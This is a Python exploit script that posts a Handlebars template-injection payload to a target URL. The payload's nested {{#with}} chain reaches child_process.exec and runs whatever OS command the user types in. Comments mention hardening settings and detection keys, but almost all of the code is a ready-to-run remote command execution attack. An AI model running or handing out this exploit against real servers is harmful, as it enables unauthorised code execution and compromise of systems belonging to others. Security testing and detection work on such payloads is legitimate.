import requests

# Upper bound, in seconds, on how long the single HTTP request may take.
TIMEOUT = 5


def exploit(url, command):
    """Send a Handlebars template-injection test payload to ``url``.

    The request is a form-encoded POST whose ``template`` field carries a
    nested ``{{#with}}`` chain with ``command`` spliced in unescaped. It can
    only have an effect if the receiving endpoint compiles that field as a
    Handlebars template; that server-side behaviour is the flaw under test.
    Rendering only fixed templates, passing user input as data, and leaving
    Handlebars' prototype-access runtime options
    (``allowProtoPropertiesByDefault``, ``allowProtoMethodsByDefault``)
    disabled are the corresponding hardening measures.

    Args:
        url: Endpoint that receives the POST.
        command: Text placed inside the payload's final helper call.

    Returns:
        None. Progress and the response body are printed to stdout.
    """
    print(f"[+] Sending exploit payload to {url}...")

    # Opening half of the template: six nested {{#with}} blocks ending in an
    # open string argument. The literal sequence (constructor / prototype /
    # process / child_process) is also what a request-body detection rule
    # would key on.
    opening = (
        '{{#with "constructor"}}'
        "{{#with prototype}}"
        '{{#with "process"}}'
        "{{#with mainModule.require}}"
        '{{#with "child_process"}}'
        "{{#with exec}}"
        '{{this "'
    )
    # Closing half: terminate the string argument, then close all six blocks.
    closing = '"}}' + "{{/with}}" * 6
    payload = opening + command + closing

    try:
        resp = requests.post(url, data={"template": payload}, timeout=TIMEOUT)
        if resp.status_code != 200:
            print(f"[!] Exploit failed with status code: {resp.status_code}")
            return
        # NOTE(review): HTTP 200 only shows that the endpoint answered; the
        # status code alone does not confirm that anything was executed, so
        # the printed body is what has to be inspected.
        print("[+] Payload executed successfully.")
        print("[+] Response:")
        print(resp.text)
    except requests.RequestException as err:
        # Connection errors, timeouts and other transport-level failures.
        print(f"[!] Error sending exploit: {err!s}")


def main():
    """Prompt for the endpoint and the command text, then run one attempt."""
    # Arguments are evaluated left to right, so the URL prompt comes first.
    exploit(
        input("Enter the target URL (e.g., http://example.com/render): "),
        input("Enter the OS command to execute: "),
    )


if __name__ == "__main__":
    main()